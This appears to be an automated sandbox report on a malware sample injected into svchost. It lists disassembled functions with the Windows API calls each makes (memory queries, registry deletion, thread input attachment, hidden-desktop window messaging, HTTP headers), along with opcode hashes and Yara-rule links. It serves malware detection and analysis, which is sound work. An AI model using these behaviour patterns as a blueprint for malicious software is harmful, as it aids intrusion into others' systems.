                                                                                                                                                                                                                    Function 02C83070 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C83079
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830AC
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830D8
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C830FF
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C8317D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2886163261-0
                                                                                                                                                                                                                    • Opcode ID: fff302ee3b30c264ee0b45909c7ee0650ba2af0419d9d1cd90c9113fc6f59942
                                                                                                                                                                                                                    • Instruction ID: c22fec3debad68109ae53af3713d6f3bc022abe314a829566c38cd502efa383c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fff302ee3b30c264ee0b45909c7ee0650ba2af0419d9d1cd90c9113fc6f59942
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C410070D002589FDB10DFA8DC84ABEBBF5EB49B14F14856AE854E7300D7749A41CF90
                                                                                                                                                                                                                    Function 02C82E10 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C82E19
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C82E4C
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C82E78
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C82E9F
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C82F1D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2886163261-0
                                                                                                                                                                                                                    • Opcode ID: 12f742ba83e8cffd235c606aaf56fba24025ccdf7a34fec089671cba5c95c871
                                                                                                                                                                                                                    • Instruction ID: 3d0eeb836fa8633fc1b3138ef879ea6f560b6d7889179de6900c53933034e2cc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12f742ba83e8cffd235c606aaf56fba24025ccdf7a34fec089671cba5c95c871
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA414071D00258AFDB10DFA8D888AAEBBF5FF48314F50856AE809E7200D3749A41CF91
                                                                                                                                                                                                                    Function 02C713C0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C713EE
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7142A
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C71456
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7147D
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C714A8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2886163261-0
                                                                                                                                                                                                                    • Opcode ID: 2384ea9097a833b24d5b8108a4602d841b8cc338c89f456d74cb20a2ae7ef3d8
                                                                                                                                                                                                                    • Instruction ID: 1d0cbe58a42e6112b8ddfa8b43695c8949b580d3d940c60503325a504768526f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2384ea9097a833b24d5b8108a4602d841b8cc338c89f456d74cb20a2ae7ef3d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C531BFB1D10209AFDB40DFA8D885AEE7BF9FB4C310F11856AE919E7240E37499418F90
                                                                                                                                                                                                                    Function 02C881F0 Relevance: 7.6, APIs: 5, Instructions: 89networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 02C88212
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88243
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8826F
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88296
                                                                                                                                                                                                                    • WSASetLastError.WS2_32(?), ref: 02C882C9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2886163261-0
                                                                                                                                                                                                                    • Opcode ID: b819b516573bc4f912785a3247e2323c5e7f75cb7350b74a62e991f6c2d5373a
                                                                                                                                                                                                                    • Instruction ID: 06586e1eaa10fa555cb0fbba212fe2088047078a4de0b2aeeb16aef29d23f064
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b819b516573bc4f912785a3247e2323c5e7f75cb7350b74a62e991f6c2d5373a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31B8B5D0020CAFDB40DFA9D984AEEBBF5FB48304F11856AE914E7200E7749A40CFA1
                                                                                                                                                                                                                    Function 02C97130 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02C97604), ref: 02C97163
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02C97604), ref: 02C9718B
                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02C97604), ref: 02C971B5
                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02C97604), ref: 02C971C3
                                                                                                                                                                                                                    • FileTimeToDosDateTime.KERNEL32(?,02C97604,?), ref: 02C971D5
                                                                                                                                                                                                                      • Part of subcall function 02C96C70: GetFileType.KERNEL32(?,00000000,00000000), ref: 02C96C79
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 60630809-0
                                                                                                                                                                                                                    • Opcode ID: 518137f2a91d0527747787b4f28273167a0e4f474879d59b772cf3842829abf8
                                                                                                                                                                                                                    • Instruction ID: d1af3c16b96baf0a17358377f1a509a5044f62bde0d5554f7e539b76d6eef2d2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 518137f2a91d0527747787b4f28273167a0e4f474879d59b772cf3842829abf8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B2171B29017449FC721CF6AD9C49ABFBFCFB88214B500A6EE59AC3940D771E508CB20
                                                                                                                                                                                                                    Function 02C936A0 Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,02C822AB,00000000,00010108,?,00000000), ref: 02C936DF
                                                                                                                                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02C93714
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C9373E
                                                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(00000104,02C822AB), ref: 02C93756
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C93762
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                                                                                    • Opcode ID: a22b862fa647e953029aae80ff2f96f161f4a9ea18174d0d1adeba07f20360f8
                                                                                                                                                                                                                    • Instruction ID: 7fb592411c16b9625478df549eae7303d651cc39d5f0bd80f854c0c5892efd56
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a22b862fa647e953029aae80ff2f96f161f4a9ea18174d0d1adeba07f20360f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A217476E40158ABDB21DA58DC48FEAB7ACEF85B10F1082D5FD44EB240D7B1AE548BD0
                                                                                                                                                                                                                    Function 02C718C0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2377537114-0
                                                                                                                                                                                                                    • Opcode ID: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
                                                                                                                                                                                                                    • Instruction ID: c08f22b8a041d20cf0afc80c082c48cf2a026f55f6d974c7d19bec6c713f0404
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E52190B1A0024AAFC714CF59E480B6ABBF5FF89304F14892CD98EC7300E771A661CB85
                                                                                                                                                                                                                    Function 02C76189 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76205
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3057210225-0
                                                                                                                                                                                                                    • Opcode ID: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
                                                                                                                                                                                                                    • Instruction ID: 4f0b01245737fa7da752c37295db53623940fa9153e1b90dd3e3a415debeda5d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B114E31E815981BEB2B9774AC0DBDD779CEF5C704F1049E9EA49D7181D3B08A848B91
                                                                                                                                                                                                                    Function 02C7C2B0 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 02C7C2C2
                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C7C2D9
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7C2EF
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C7C300
                                                                                                                                                                                                                    • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02C7C317
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1270303404-0
                                                                                                                                                                                                                    • Opcode ID: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
                                                                                                                                                                                                                    • Instruction ID: fa5839e23e620cd07b6d641c22ee302d381c8dd328d23801ca2f16bbda693b11
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB016D31A81658BBE721DB909D09FEABB7CAB05700F004685BE05A61C0DBB05B84CAA9
                                                                                                                                                                                                                    Function 02C7D330 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?,?,00000000,76233080,?,02C782BC,?,00000006,00000000), ref: 02C7D33C
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7D353
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7D356
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000006,?,02C782BC), ref: 02C7D36D
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000003), ref: 02C7D372
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3855296974-0
                                                                                                                                                                                                                    • Opcode ID: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
                                                                                                                                                                                                                    • Instruction ID: ac6f0cea62db6b4614dbee0b083b0783286056901d2d81e97fb8edad2a23fa5b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F08276A807187FD622DB55EC88FABB7ACEFC8B60F014605F90497340CA70ED118AB0
                                                                                                                                                                                                                    Function 02C7C330 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7C344
                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2643679612-0
                                                                                                                                                                                                                    • Opcode ID: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
                                                                                                                                                                                                                    • Instruction ID: 959e801d460fe618b7d861801d82dddbef8d6917c6acba2e40b479354d5c2cc3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F03732680344BBD7115BA5EC8DF9BBF6CEB89761F004955FA05C7241C575DC118A70
                                                                                                                                                                                                                    Function 02C7D2F0 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7D2FA
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7D302
                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D314
                                                                                                                                                                                                                    • GetFocus.USER32 ref: 02C7D316
                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D323
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 968181190-0
                                                                                                                                                                                                                    • Opcode ID: 147987f55d11e5604dcac225d12b0c0a976c67476d363a4c1d756db7917f9057
                                                                                                                                                                                                                    • Instruction ID: 28bfdfac62720a456aaab90a63a047adc048fab3a29c7a037b15124af4f38da9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 147987f55d11e5604dcac225d12b0c0a976c67476d363a4c1d756db7917f9057
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05E0D832E80254BBD71257B6AC4DF9BBFACEB85761F100A95FA08C3241D575DC108AB0
                                                                                                                                                                                                                    Function 02C873B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strncpy.MSVCRT ref: 02C87461
                                                                                                                                                                                                                      • Part of subcall function 02C86DE0: fseek.MSVCRT ref: 02C86E04
                                                                                                                                                                                                                      • Part of subcall function 02C86DE0: fwrite.MSVCRT ref: 02C86E17
                                                                                                                                                                                                                    • fseek.MSVCRT ref: 02C873EA
                                                                                                                                                                                                                    • fread.MSVCRT ref: 02C87408
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: fseek$freadfwritestrncpy
                                                                                                                                                                                                                    • String ID: 7f1bf8b2
                                                                                                                                                                                                                    • API String ID: 3817246059-2242988197
                                                                                                                                                                                                                    • Opcode ID: a79c007313c34b4014313cf13caa20cf08d1be367463825b5006dbe7b7b136ba
                                                                                                                                                                                                                    • Instruction ID: b8e7cecda93eb0dead1d0f925f56b964769aedb0d50f87b117b0d37f1e7c93e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a79c007313c34b4014313cf13caa20cf08d1be367463825b5006dbe7b7b136ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0631A479A006418FC731DB28D484B22FBE5EFC5218F288A9DD48587752E335E8C9CFA1
                                                                                                                                                                                                                    Function 02C7FE80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 02C7FEF3
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FF02
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeadersHttpRequest
                                                                                                                                                                                                                    • String ID: ($Accept-Encoding:
                                                                                                                                                                                                                    • API String ID: 1754618566-3981465706
                                                                                                                                                                                                                    • Opcode ID: 92cc8b8512d096f058db4953c44d0e11fec2a3b11213a36eb77430e54254dbda
                                                                                                                                                                                                                    • Instruction ID: 16e37e555267c3db740efa0454b5c3534b8a44a3dd256ca26184706643e49a1d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cc8b8512d096f058db4953c44d0e11fec2a3b11213a36eb77430e54254dbda
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E11FCB1904345AFD750DF29D880B6BBBE8EB88654F004A2EF959D3241D730D904CBA2
                                                                                                                                                                                                                    Function 02C8E1B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E1D7
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C8E240
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
